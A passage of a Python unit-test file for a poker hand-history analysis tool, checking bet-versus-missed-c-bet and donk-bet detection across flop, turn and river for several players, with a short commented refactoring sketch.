self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XX__T__XX__R__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
def test_enum_b_vs_mcb_def(self):
# folder containing the expected answers
folder = f + '/testy/rece/'
file = 'in1gr3r__F__XBFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr3r__F__XBCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr3r__F__XBFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXBCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXBCC__T__BRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual('2bet', tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual('call', tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__XXBCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XX__T__XX__R__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXBFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual('fold', tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_def(),
msg=file + ' ' + strt + ' ' + plr)
def test_b_vs_mcb_raise_def_opp(self):
# folder containing the correct answers
folder = f + '/testy/rece/'
file = 'in1gr3r__F__XBRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBRCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBRRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(True, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(False, tmp.b_vs_mcb_raise_def_opp(),
msg=file + ' ' + strt + ' ' + plr)
def test_enum_b_vs_mcb_raise_def(self):
# folder containing the correct answers
folder = f + '/testy/rece/'
file = 'in1gr3r__F__XBRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual('call 2bet', tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBRCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__XBRRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BCRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BRRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual('call 2bet', tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XXX__T__BFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual('call 2bet', tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = BVsMcb(hand, strt, plr)
self.assertEqual(None, tmp.enum_b_vs_mcb_raise_def(),
msg=file + ' ' + strt + ' ' + plr)
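# The test methods above repeat the same open-file / construct / assert pattern
# for every (street, player) combination. A table-driven loop with subTest, as
# sketched below, would keep each scenario down to one tuple and report every
# failing combination separately. This is only an illustrative sketch: _StubDb
# is a hypothetical stand-in for the real Reka/Db classes, not project API.
import unittest

class _StubDb:
    """Minimal stand-in for Db: returns a canned answer per (street, player)."""
    _table = {('flop', 'sf'): True, ('flop', 'zw'): False}

    def __init__(self, hand, strt, plr):
        self.key = (strt, plr)

    def db(self):
        return self._table.get(self.key, False)

class _TestDbTableDriven(unittest.TestCase):
    def test_db_table(self):
        # Each tuple: (street, player, expected result of db()).
        cases = [('flop', 'sf', True), ('flop', 'zw', False)]
        for strt, plr, expected in cases:
            with self.subTest(strt=strt, plr=plr):
                tmp = _StubDb(None, strt, plr)
                self.assertEqual(expected, tmp.db())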
class TestDonkBet(unittest.TestCase):
def test_db_opp(self):
# folder containing the correct answers
folder = f + '/testy/rece/'
file = 'in0gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
self.assertEqual(False, tmp.db_opp(),
msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__BRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Db(hand, strt, plr)
self.assertEqual(True, tmp.db_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Db(hand, strt, plr)
